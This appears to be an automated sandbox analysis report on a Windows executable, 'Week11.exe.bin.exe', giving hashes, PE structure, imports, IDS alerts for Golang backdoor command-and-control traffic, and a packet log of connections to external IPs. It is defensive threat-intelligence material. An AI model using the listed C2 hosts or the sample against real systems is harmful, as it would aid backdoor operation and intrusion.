                          Preview:...>.3W[.."...4.S2R$A</4L-[S]0 .X.^^M...Q%.9@.8.Q..#Z&.%\."#M.9VX40.^.(=U.Y.E)5...<...<_.R5..$^2Y>!.F.3_A...W_.._R..@<.%[%]1G..\\4.QP,.._..*@7._UWY%X%) B>"..&V<."..../0...6SU.8A...L594P*%.].%)M6%.X1-$V2'.V...G4.6_.*.V;-.P)9<@^-TQ...\$%<]0..O#61."2..P.-...0.5%$T.'7LZ.4FPW.W.&.R..-G. <\.+.RY6.[^..@.+.R^.._52(X.<4M-W.P3(._.>.O.90.R....9..W!...[,T%8.L(-.F..8_R..[%4.Q...@.%"R\><ZW. ^2.5M+.Q[.-.^6.RU8>.G...\3..W,.QZ.(.

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.35629862468688
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Week11.exe.bin.exe
                          File size:8'848'896 bytes
                          MD5:4fbc4f26e90324c3b535943452460761
                          SHA1:032f96166bb573c9029f65aefb91d22b8a4940ed
                          SHA256:82e9465d41073e2678135009e179de5a0d0973bf439f6cac53db9b9f45130148
                          SHA512:a6e2bf5a0f5268aaae2dd21f1fede5be9a6afc9bf967438578fd4809a58859ce873c6aa3fc95ec65e2a29470577c4ffa8f0ad186f410f76533d5b2e5d7094c09
                          SSDEEP:98304:O3joQ1BjUhH1aOFHyq0KqSYLsDu0eK0DuCglDboo:ijUhVa2HyqgLIuXKyu1R0o
                          TLSH:EF96AEAB09176DD5EEF84F719728E99A4396C463B93CC1BEBB4764A8C211BC344E03D4
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,...,...,.......,.......,...B...,...A...,...W...,...-...,.......,.....i.,.......,.......,.......,.......,.Rich..,........

                          File Icon

                          Icon Hash:615545d4aaa2d423

                          Static PE Info

                          General

                          Entrypoint:0x48eb4e
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x5F92B0F1 [Fri Oct 23 10:31:13 2020 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:44c9a0d6caae769769c87976fb6f71d4

                          Authenticode Signature

                          Signature Valid:
                          Signature Issuer:
                          Signature Validation Error:
                          Error Number:
                          Not Before, Not After
                            Subject Chain
                              Version:
                              Thumbprint MD5:
                              Thumbprint SHA-1:
                              Thumbprint SHA-256:
                              Serial:

                              Entrypoint Preview

                              Instruction
                              call 00007F3D448D4EB9h
                              jmp 00007F3D448C6D0Eh
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              push ecx
                              push ebx
                              mov eax, dword ptr [ebp+0Ch]
                              add eax, 0Ch
                              mov dword ptr [ebp-04h], eax
                              mov ebx, dword ptr fs:[00000000h]
                              mov eax, dword ptr [ebx]
                              mov dword ptr fs:[00000000h], eax
                              mov eax, dword ptr [ebp+08h]
                              mov ebx, dword ptr [ebp+0Ch]
                              mov ebp, dword ptr [ebp-04h]
                              mov esp, dword ptr [ebx-04h]
                              jmp eax
                              pop ebx
                              leave
                              retn 0008h
                              pop eax
                              pop ecx
                              xchg dword ptr [esp], eax
                              jmp eax
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              push ecx
                              push ecx
                              push ebx
                              push esi
                              push edi
                              mov esi, dword ptr fs:[00000000h]
                              mov dword ptr [ebp-04h], esi
                              mov dword ptr [ebp-08h], 0048EBBCh
                              push 00000000h
                              push dword ptr [ebp+0Ch]
                              push dword ptr [ebp-08h]
                              push dword ptr [ebp+08h]
                              call 00007F3D448DF963h
                              mov eax, dword ptr [ebp+0Ch]
                              mov eax, dword ptr [eax+04h]
                              and eax, FFFFFFFDh
                              mov ecx, dword ptr [ebp+0Ch]
                              mov dword ptr [ecx+04h], eax
                              mov edi, dword ptr fs:[00000000h]
                              mov ebx, dword ptr [ebp-04h]
                              mov dword ptr [ebx], edi
                              mov dword ptr fs:[00000000h], ebx
                              pop edi
                              pop esi
                              pop ebx
                              leave
                              retn 0008h
                              push ebp
                              mov ebp, esp
                              sub esp, 08h
                              push ebx
                              push esi
                              push edi
                              cld
                              mov dword ptr [ebp-04h], eax
                              xor eax, eax
                              push eax
                              push eax
                              push eax
                              push dword ptr [ebp-04h]
                              push dword ptr [ebp+14h]
                              push dword ptr [ebp+10h]
                              push dword ptr [ebp+0Ch]
                              push dword ptr [ebp+08h]
                              call 00007F3D448D5A7Dh
                              add esp, 20h
                              mov dword ptr [ebp-08h], eax
                              pop edi
                              pop esi
                              pop ebx
                              mov eax, dword ptr [ebp+00h]

                              Rich Headers

                              Programming Language:
                              • [C++] VS2008 build 21022
                              • [C++] VS2005 build 50727
                              • [ C ] VS2005 build 50727
                              • [IMP] VS2005 build 50727
                              • [ASM] VS2008 SP1 build 30729
                              • [ C ] VS2008 SP1 build 30729
                              • [C++] VS2008 SP1 build 30729
                              • [RES] VS2008 build 21022
                              • [LNK] VS2008 SP1 build 30729

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xd771c0x190.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xe90000x790d5c.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x1238980x37a8.rsrc
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x11b0000x9dd0.rsrc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb8c100x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc67200x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0xb80000x8ac.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000xb70000xb6c00209499c11726f362ccd66f1fbadf0dd2False0.5103921746751026data6.788533709823602IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0xb80000x230000x22800eb91e1596f235b3413d6fa622b45c87aFalse0.32765794836956524data4.672379036995675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xdb0000xe0000x6000d2bdce02712eb535a94a1cb6ac8c2cc2False0.2332763671875OpenPGP Public Key4.3556072570206315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0xe90000x790d5c0x790e00067ffc953e40fa64a98d03031022ba0aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              UIDATA0xe93c40x29e4aZip archive data, at least v1.0 to extract, compression method=storeEnglishUnited States0.14798885741925707
                              UIDATA0x1132100x1774XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminatorsEnglishUnited States0.14723517654896737
                              UIDATA0x1149840x10beUnicode text, UTF-16, little-endian text, with CRLF line terminatorsEnglishUnited States0.1532897806812879
                              RT_ICON0x115a440xaae0PC bitmap, Windows 3.x format, 6329 x 2 x 41, image size 44655, cbSize 43744, bits offset 540.5107671909290417
                              RT_ICON0x1205240x86eePC bitmap, Windows 3.x format, 4542 x 2 x 53, image size 34904, cbSize 34542, bits offset 540.422992299229923
                              RT_ICON0x128c140x3e9bPC bitmap, Windows 3.x format, 2443 x 2 x 46, image size 16391, cbSize 16027, bits offset 540.4940413052973108
                              RT_ICON0x12cab00x1817dPC bitmap, Windows 3.x format, 12386 x 2 x 41, image size 98844, cbSize 98685, bits offset 540.4911992704058368
                              RT_ICON0x144c300x730236PC bitmap, Windows 3.x format, 942397 x 2 x 51, image size 7537883, cbSize 7537206, bits offset 540.6396074295043945
                              RT_ICON0x874e680xffbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8944023466145197
                              RT_ICON0x875e640x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.04948132780082987
                              RT_ICON0x87840c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.0825515947467167
                              RT_ICON0x8794b40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.19858156028368795
                              RT_RCDATA0x87991c0x80dataEnglishUnited States1.0859375
                              RT_GROUP_ICON0x87999c0x3edataEnglishUnited States0.8064516129032258
                              RT_VERSION0x8799dc0x380dataEnglishUnited States0.43191964285714285

                              Imports

                              DLLImport
                              KERNEL32.dllExitThread, CreateThread, ExitProcess, GetStartupInfoW, RtlUnwind, HeapReAlloc, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LCMapStringW, GetStdHandle, GetModuleFileNameA, GetTimeFormatA, GetDateFormatA, HeapCreate, HeapDestroy, VirtualFree, VirtualAlloc, GetConsoleCP, GetConsoleMode, LCMapStringA, SetHandleCount, GetFileType, GetStartupInfoA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetStringTypeA, GetStringTypeW, IsDebuggerPresent, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, GetProcessHeap, CreateFileA, SetEnvironmentVariableA, SetUnhandledExceptionFilter, HeapAlloc, TerminateProcess, GetFileSizeEx, LocalFileTimeToFileTime, GetLocaleInfoW, CompareStringA, GetShortPathNameW, SetEndOfFile, FlushFileBuffers, GlobalFlags, GlobalAddAtomW, GlobalFindAtomW, lstrcmpiA, GetTempFileNameW, OpenMutexW, ReleaseMutex, HeapWalk, HeapLock, OpenThread, HeapUnlock, OutputDebugStringW, SetFilePointerEx, IsProcessorFeaturePresent, GlobalDeleteAtom, LoadLibraryA, GetVersionExA, UnhandledExceptionFilter, HeapFree, lstrlenA, lstrcmpA, CompareStringW, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, GetFullPathNameW, GetLogicalDriveStringsW, DeviceIoControl, InterlockedExchange, MoveFileW, GetFileAttributesW, RemoveDirectoryW, FindClose, FindNextFileW, FindFirstFileW, QueryPerformanceCounter, SetFileAttributesW, lstrcmpW, GlobalAlloc, GlobalLock, GlobalUnlock, SetErrorMode, SetEnvironmentVariableW, GetCommandLineW, ExpandEnvironmentStringsW, lstrcmpiW, lstrlenW, SetFilePointer, InterlockedIncrement, ProcessIdToSessionId, FreeResource, GetSystemWindowsDirectoryW, LocalAlloc, SystemTimeToFileTime, GetModuleHandleA, GetTimeZoneInformation, LocalFree, GlobalFree, CreateMutexW, FreeConsole, GetCurrentProcessId, LoadLibraryExW, GetTempPathW, GetDriveTypeW, GetWindowsDirectoryW, GetUserDefaultUILanguage, SetCurrentDirectoryW, GetPrivateProfileStringW, GetPrivateProfileSectionW, GetPrivateProfileSectionNamesW, Sleep, InterlockedCompareExchange, GetVersionExW, GetModuleFileNameW, MultiByteToWideChar, WriteFile, ReadFile, GetFileSize, CreateFileW, CopyFileW, FreeLibrary, LoadLibraryW, GetModuleHandleW, GetProcAddress, InterlockedDecrement, MulDiv, GetCurrentProcess, SetEvent, CreateEventW, ResetEvent, GetTickCount, WaitForSingleObject, WideCharToMultiByte, GetSystemTimeAsFileTime, DeleteFileW, GetVersion, GetSystemDirectoryW, SetLastError, RaiseException, DeleteCriticalSection, InitializeCriticalSection, CreateProcessW, GetLastError, OpenProcess, FindResourceExW, FindResourceW, LoadResource, LockResource, SizeofResource, CloseHandle, LeaveCriticalSection, EnterCriticalSection, GetCurrentThreadId, FlushInstructionCache, GetUserDefaultLCID
                              USER32.dllGetWindowTextW, GetWindowTextLengthW, RedrawWindow, DrawTextW, DispatchMessageW, TranslateMessage, GetMessageW, SetWindowTextW, GetWindow, MonitorFromWindow, MapWindowPoints, IsRectEmpty, IsDialogMessageW, GetClientRect, DrawIconEx, DestroyIcon, GetActiveWindow, MessageBoxW, InvalidateRect, MonitorFromRect, PostQuitMessage, UnhookWindowsHookEx, GetLastActivePopup, GetSubMenu, GetMenuItemCount, GetMenuItemID, GetMenuState, ValidateRect, CallNextHookEx, SetWindowsHookExW, GetSysColorBrush, CheckMenuItem, EnableMenuItem, ModifyMenuW, SetCursor, GetDlgCtrlID, GetKeyState, GetWindowDC, BeginPaint, LoadBitmapW, SetWindowLongW, GetWindowLongW, DefWindowProcW, CallWindowProcW, GetWindowThreadProcessId, FindWindowW, SendMessageTimeoutW, IsWindow, KillTimer, GetMenuCheckMarkDimensions, DestroyWindow, GetWindowPlacement, ShowWindow, SetTimer, IsWindowVisible, RegisterClassExW, GetClassInfoExW, SetMenu, GetMessageTime, GetTopWindow, RemovePropW, GetPropW, SetPropW, GetCapture, WinHelpW, DestroyMenu, TabbedTextOutW, DrawTextExW, GrayStringW, EndPaint, SetCapture, ReleaseCapture, GetClassLongW, SetClassLongW, BringWindowToTop, SwitchToThisWindow, GetSystemMetrics, CharNextW, PeekMessageW, DestroyAcceleratorTable, InvalidateRgn, FillRect, CreateAcceleratorTableW, GetSysColor, GetClassNameW, GetDlgItem, IsChild, LoadImageW, LoadIconW, GetDesktopWindow, LoadCursorW, CreateWindowExW, EnableWindow, GetParent, SendMessageW, SetWindowPos, LoadStringW, UnregisterClassA, SetFocus, IsWindowEnabled, SetRectEmpty, RegisterWindowMessageW, GetDC, ReleaseDC, GetFocus, CopyRect, OffsetRect, ClientToScreen, GetMessagePos, PtInRect, ScreenToClient, MoveWindow, GetWindowRect, GetMonitorInfoW, AllowSetForegroundWindow, GetForegroundWindow, AttachThreadInput, SetForegroundWindow, SetActiveWindow, SetMenuItemBitmaps, IsIconic, SystemParametersInfoA, GetMenu, AdjustWindowRectEx, RegisterClassW, PostMessageW, GetKeyboardState, keybd_event, GetClassInfoW
                              GDI32.dllScaleWindowExtEx, PtVisible, SetWindowExtEx, SetMapMode, RestoreDC, SaveDC, ExtTextOutW, GetClipBox, CreateBitmap, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, Escape, TextOutW, RectVisible, GetStockObject, BitBlt, SetViewportOrgEx, GetPixel, CreateCompatibleBitmap, CreateFontW, SetTextColor, SetBkColor, CreateSolidBrush, GetTextExtentPoint32W, GetTextMetricsW, GetObjectA, GetObjectW, SelectObject, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps
                              WINSPOOL.DRVClosePrinter, DocumentPropertiesW, OpenPrinterW
                              ADVAPI32.dllRegOpenKeyExA, ConvertSidToStringSidW, RegQueryValueExA, RegDeleteValueW, RegEnumKeyExW, RegQueryInfoKeyW, RegDeleteKeyW, GetSidSubAuthority, GetTokenInformation, OpenProcessToken, RegCreateKeyExW, RegSetValueExW, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegEnumKeyExA
                              SHELL32.dllSHOpenFolderAndSelectItems, SHGetMalloc, SHGetSpecialFolderLocation, DragAcceptFiles, DragFinish, DragQueryFileW, SHGetFileInfoW, ShellExecuteExW, ShellExecuteW, SHGetPathFromIDListW, SHGetSpecialFolderPathW, SHGetFolderPathW
                              ole32.dllOleLockRunning, StringFromGUID2, OleUninitialize, OleInitialize, CoCreateInstance, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree, CoInitialize, CoUninitialize, CoGetClassObject, CLSIDFromProgID, CLSIDFromString, CreateStreamOnHGlobal
                              OLEAUT32.dllVariantChangeType, LoadTypeLib, LoadRegTypeLib, SysStringLen, OleCreateFontIndirect, VarUI4FromStr, SysAllocStringLen, VarBstrCmp, SafeArrayUnlock, SafeArrayLock, SafeArrayDestroy, SafeArrayCreate, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, SafeArrayCopy, SafeArrayGetVartype, DispCallFunc, VariantInit, VariantClear, SysAllocString, SysFreeString
                              SHLWAPI.dllStrCmpIW, PathCompactPathW, PathStripPathW, PathFindFileNameW, PathIsDirectoryW, PathAddBackslashW, StrStrIW, PathRemoveFileSpecW, PathAppendW, PathCombineW, SHSetValueA, SHGetValueA, PathFileExistsW, ColorHLSToRGB, ColorRGBToHLS, SHGetValueW, wnsprintfW
                              COMCTL32.dllInitCommonControlsEx
                              gdiplus.dllGdipDeletePrivateFontCollection, GdipNewPrivateFontCollection, GdipDrawImageRectRectI, GdipDrawLine, GdipAddPathEllipseI, GdipGetPathGradientPointCount, GdipSetPathGradientSurroundColorsWithCount, GdipSetPathGradientCenterColor, GdipCreatePathGradientFromPath, GdipCreateFromHWND, GdipGetFontHeight, GdipCreatePen2, GdipDrawRectangleI, GdipCreateLineBrushFromRect, GdipAddPathRectangleI, GdipPrivateAddMemoryFont, GdipSetPenWidth, GdipDrawEllipseI, GdipSetPenDashOffset, GdipAddPathLineI, GdipSetPixelOffsetMode, GdipDrawImageRectI, GdipGetImageGraphicsContext, GdipGetImagePixelFormat, GdipDrawImagePointRectI, GdipResetWorldTransform, GdipCreateBitmapFromScan0, GdipDrawPath, GdipFillPath, GdipSetSmoothingMode, GdipGetSmoothingMode, GdipResetClip, GdipCreatePath, GdipFillRectangleI, GdipRotateWorldTransform, GdipGetPixelOffsetMode, GdipTranslateWorldTransform, GdipSetClipRectI, GdipSetTextRenderingHint, GdipCreateFont, GdipGetFontCollectionFamilyList, GdipCreateLineBrushFromRectI, GdipClosePathFigure, GdipAddPathArcI, GdipResetPath, GdipDrawString, GdipMeasureString, GdipSetStringFormatAlign, GdipSetStringFormatLineAlign, GdipDeleteStringFormat, GdipCreateStringFormat, GdipDeleteFont, GdipCreateFontFromLogfontA, GdipCreateFontFromDC, GdipDrawRectangle, GdipDrawLineI, GdipSetPenDashStyle, GdipDeletePen, GdipCreatePen1, GdipBitmapSetPixel, GdipBitmapGetPixel, GdipGetImageHeight, GdipGetImageWidth, GdipCreateBitmapFromFile, GdipCloneImage, GdipDisposeImage, GdipFillRectangle, GdipCloneBrush, GdipAlloc, GdipFree, GdipDeleteBrush, GdipCreateSolidFill, GdipDeleteGraphics, GdipCreateFromHDC, GdipCreateBitmapFromStream, GdipSetPathGradientGammaCorrection, GdipSetPathGradientCenterPoint, GdipAddPathLine2, GdipGetPathWorldBoundsI, GdipAddPathPie, GdipAddPathLine, GdipAddPathArc, GdipSaveImageToFile, GdipGetImageEncoders, GdipGetImageEncodersSize, GdipSetInterpolationMode, GdipCloneFontFamily, GdipDeleteFontFamily, GdipDeletePath, GdipSetLinePresetBlend
                              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                              WININET.dllInternetCloseHandle, HttpQueryInfoW, InternetSetOptionW, InternetReadFile, InternetOpenUrlW, DeleteUrlCacheEntryW, InternetOpenW
                              PSAPI.DLLGetModuleFileNameExW
                              IMM32.dllImmDisableIME
                              RPCRT4.dllNdrAsyncClientCall, RpcAsyncInitializeHandle, RpcStringBindingComposeW, RpcBindingFromStringBindingW, RpcAsyncCompleteCall, RpcStringFreeW, RpcBindingFree
                              OLEACC.dllLresultFromObject, CreateStdAccessibleObject
                              WTSAPI32.dllWTSQuerySessionInformationW
                              USERENV.dllGetUserProfileDirectoryW

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-10T16:48:27.568206+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.749740TCP
                              2024-11-10T16:48:51.808061+01002855539ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M21185.157.213.25312072192.168.2.749893TCP
                              2024-11-10T16:48:51.808327+01002855536ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M11192.168.2.749893185.157.213.25312072TCP
                              2024-11-10T16:49:06.205644+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.749966TCP
                              2024-11-10T16:49:21.106238+01002855537ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M21192.168.2.749893185.157.213.25312072TCP
                              2024-11-10T16:49:21.344322+01002855538ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M11185.157.213.25312072192.168.2.749893TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 10, 2024 16:48:10.065001965 CET4969980192.168.2.746.8.232.106
                              Nov 10, 2024 16:48:10.069967985 CET804969946.8.232.106192.168.2.7
                              Nov 10, 2024 16:48:10.070074081 CET4969980192.168.2.746.8.232.106
                              Nov 10, 2024 16:48:10.071127892 CET4969980192.168.2.746.8.232.106
                              Nov 10, 2024 16:48:10.077454090 CET804969946.8.232.106192.168.2.7
                              Nov 10, 2024 16:48:10.942055941 CET804969946.8.232.106192.168.2.7
                              Nov 10, 2024 16:48:10.991493940 CET4969980192.168.2.746.8.232.106
                              Nov 10, 2024 16:48:11.011552095 CET4970080192.168.2.746.8.236.61
                              Nov 10, 2024 16:48:11.016408920 CET804970046.8.236.61192.168.2.7
                              Nov 10, 2024 16:48:11.016529083 CET4970080192.168.2.746.8.236.61
                              Nov 10, 2024 16:48:11.032814980 CET4970080192.168.2.746.8.236.61
                              Nov 10, 2024 16:48:11.038469076 CET804970046.8.236.61192.168.2.7
                              Nov 10, 2024 16:48:11.878170967 CET804970046.8.236.61192.168.2.7
                              Nov 10, 2024 16:48:11.899976969 CET4970180192.168.2.793.185.159.253
                              Nov 10, 2024 16:48:11.904937029 CET804970193.185.159.253192.168.2.7
                              Nov 10, 2024 16:48:11.905029058 CET4970180192.168.2.793.185.159.253
                              Nov 10, 2024 16:48:11.905344009 CET4970180192.168.2.793.185.159.253
                              Nov 10, 2024 16:48:11.910208941 CET804970193.185.159.253192.168.2.7
                              Nov 10, 2024 16:48:11.921319962 CET4970080192.168.2.746.8.236.61
                              Nov 10, 2024 16:48:12.779258966 CET804970193.185.159.253192.168.2.7
                              Nov 10, 2024 16:48:12.802493095 CET4970280192.168.2.791.212.166.91
                              Nov 10, 2024 16:48:12.807491064 CET804970291.212.166.91192.168.2.7
                              Nov 10, 2024 16:48:12.807600975 CET4970280192.168.2.791.212.166.91
                              Nov 10, 2024 16:48:12.807813883 CET4970280192.168.2.791.212.166.91
                              Nov 10, 2024 16:48:12.813083887 CET804970291.212.166.91192.168.2.7
                              Nov 10, 2024 16:48:12.823893070 CET4970180192.168.2.793.185.159.253
                              Nov 10, 2024 16:48:13.719944000 CET804970291.212.166.91192.168.2.7
                              Nov 10, 2024 16:48:13.761356115 CET4970280192.168.2.791.212.166.91
                              Nov 10, 2024 16:48:13.942419052 CET4970380192.168.2.7188.130.206.243
                              Nov 10, 2024 16:48:13.947570086 CET8049703188.130.206.243192.168.2.7
                              Nov 10, 2024 16:48:13.947645903 CET4970380192.168.2.7188.130.206.243
                              Nov 10, 2024 16:48:13.962546110 CET4970380192.168.2.7188.130.206.243
                              Nov 10, 2024 16:48:13.968713999 CET8049703188.130.206.243192.168.2.7
                              Nov 10, 2024 16:48:15.247839928 CET8049703188.130.206.243192.168.2.7
                              Nov 10, 2024 16:48:15.248121023 CET4970380192.168.2.7188.130.206.243
                              Nov 10, 2024 16:48:15.248181105 CET4970180192.168.2.793.185.159.253
                              Nov 10, 2024 16:48:15.248193979 CET4970280192.168.2.791.212.166.91
                              Nov 10, 2024 16:48:15.248251915 CET4969980192.168.2.746.8.232.106
                              Nov 10, 2024 16:48:15.248276949 CET4970080192.168.2.746.8.236.61
                              Nov 10, 2024 16:48:15.253757000 CET8049703188.130.206.243192.168.2.7
                              Nov 10, 2024 16:48:15.254115105 CET4970380192.168.2.7188.130.206.243
                              Nov 10, 2024 16:48:15.254277945 CET804970193.185.159.253192.168.2.7
                              Nov 10, 2024 16:48:15.254288912 CET804970291.212.166.91192.168.2.7
                              Nov 10, 2024 16:48:15.254298925 CET804969946.8.232.106192.168.2.7
                              Nov 10, 2024 16:48:15.254411936 CET4970180192.168.2.793.185.159.253
                              Nov 10, 2024 16:48:15.254414082 CET4970280192.168.2.791.212.166.91
                              Nov 10, 2024 16:48:15.254456997 CET4969980192.168.2.746.8.232.106
                              Nov 10, 2024 16:48:15.256875992 CET804970046.8.236.61192.168.2.7
                              Nov 10, 2024 16:48:15.256957054 CET4970080192.168.2.746.8.236.61
                              Nov 10, 2024 16:48:45.272735119 CET4985480192.168.2.746.8.232.106
                              Nov 10, 2024 16:48:45.277693987 CET804985446.8.232.106192.168.2.7
                              Nov 10, 2024 16:48:45.277818918 CET4985480192.168.2.746.8.232.106
                              Nov 10, 2024 16:48:45.278079987 CET4985480192.168.2.746.8.232.106
                              Nov 10, 2024 16:48:45.282883883 CET804985446.8.232.106192.168.2.7
                              Nov 10, 2024 16:48:46.231353045 CET804985446.8.232.106192.168.2.7
                              Nov 10, 2024 16:48:46.255223989 CET4986080192.168.2.746.8.236.61
                              Nov 10, 2024 16:48:46.260148048 CET804986046.8.236.61192.168.2.7
                              Nov 10, 2024 16:48:46.260250092 CET4986080192.168.2.746.8.236.61
                              Nov 10, 2024 16:48:46.260587931 CET4986080192.168.2.746.8.236.61
                              Nov 10, 2024 16:48:46.265599012 CET804986046.8.236.61192.168.2.7
                              Nov 10, 2024 16:48:46.276494980 CET4985480192.168.2.746.8.232.106
                              Nov 10, 2024 16:48:47.175920963 CET804986046.8.236.61192.168.2.7
                              Nov 10, 2024 16:48:47.198432922 CET4986680192.168.2.793.185.159.253
                              Nov 10, 2024 16:48:47.203372002 CET804986693.185.159.253192.168.2.7
                              Nov 10, 2024 16:48:47.203485012 CET4986680192.168.2.793.185.159.253
                              Nov 10, 2024 16:48:47.203821898 CET4986680192.168.2.793.185.159.253
                              Nov 10, 2024 16:48:47.208656073 CET804986693.185.159.253192.168.2.7
                              Nov 10, 2024 16:48:47.219984055 CET4986080192.168.2.746.8.236.61
                              Nov 10, 2024 16:48:48.065321922 CET804986693.185.159.253192.168.2.7
                              Nov 10, 2024 16:48:48.087518930 CET4987280192.168.2.791.212.166.91
                              Nov 10, 2024 16:48:48.092461109 CET804987291.212.166.91192.168.2.7
                              Nov 10, 2024 16:48:48.092581987 CET4987280192.168.2.791.212.166.91
                              Nov 10, 2024 16:48:48.092874050 CET4987280192.168.2.791.212.166.91
                              Nov 10, 2024 16:48:48.097819090 CET804987291.212.166.91192.168.2.7
                              Nov 10, 2024 16:48:48.108997107 CET4986680192.168.2.793.185.159.253
                              Nov 10, 2024 16:48:48.975406885 CET804987291.212.166.91192.168.2.7
                              Nov 10, 2024 16:48:49.009618998 CET4987880192.168.2.7188.130.206.243
                              Nov 10, 2024 16:48:49.014575958 CET8049878188.130.206.243192.168.2.7
                              Nov 10, 2024 16:48:49.014672041 CET4987880192.168.2.7188.130.206.243
                              Nov 10, 2024 16:48:49.016057968 CET4987880192.168.2.7188.130.206.243
                              Nov 10, 2024 16:48:49.020998955 CET8049878188.130.206.243192.168.2.7
                              Nov 10, 2024 16:48:49.032305956 CET4987280192.168.2.791.212.166.91
                              Nov 10, 2024 16:48:51.090313911 CET8049878188.130.206.243192.168.2.7
                              Nov 10, 2024 16:48:51.094146967 CET4987280192.168.2.791.212.166.91
                              Nov 10, 2024 16:48:51.094182968 CET4986680192.168.2.793.185.159.253
                              Nov 10, 2024 16:48:51.094188929 CET4986080192.168.2.746.8.236.61
                              Nov 10, 2024 16:48:51.094216108 CET4985480192.168.2.746.8.232.106
                              Nov 10, 2024 16:48:51.094536066 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:48:51.101241112 CET804987291.212.166.91192.168.2.7
                              Nov 10, 2024 16:48:51.101253033 CET804986046.8.236.61192.168.2.7
                              Nov 10, 2024 16:48:51.101267099 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:48:51.101324081 CET4987280192.168.2.791.212.166.91
                              Nov 10, 2024 16:48:51.101329088 CET4986080192.168.2.746.8.236.61
                              Nov 10, 2024 16:48:51.101352930 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:48:51.102247953 CET804986693.185.159.253192.168.2.7
                              Nov 10, 2024 16:48:51.102287054 CET804985446.8.232.106192.168.2.7
                              Nov 10, 2024 16:48:51.102297068 CET4986680192.168.2.793.185.159.253
                              Nov 10, 2024 16:48:51.102355003 CET4985480192.168.2.746.8.232.106
                              Nov 10, 2024 16:48:51.133238077 CET4987880192.168.2.7188.130.206.243
                              Nov 10, 2024 16:48:51.808060884 CET1207249893185.157.213.253192.168.2.7
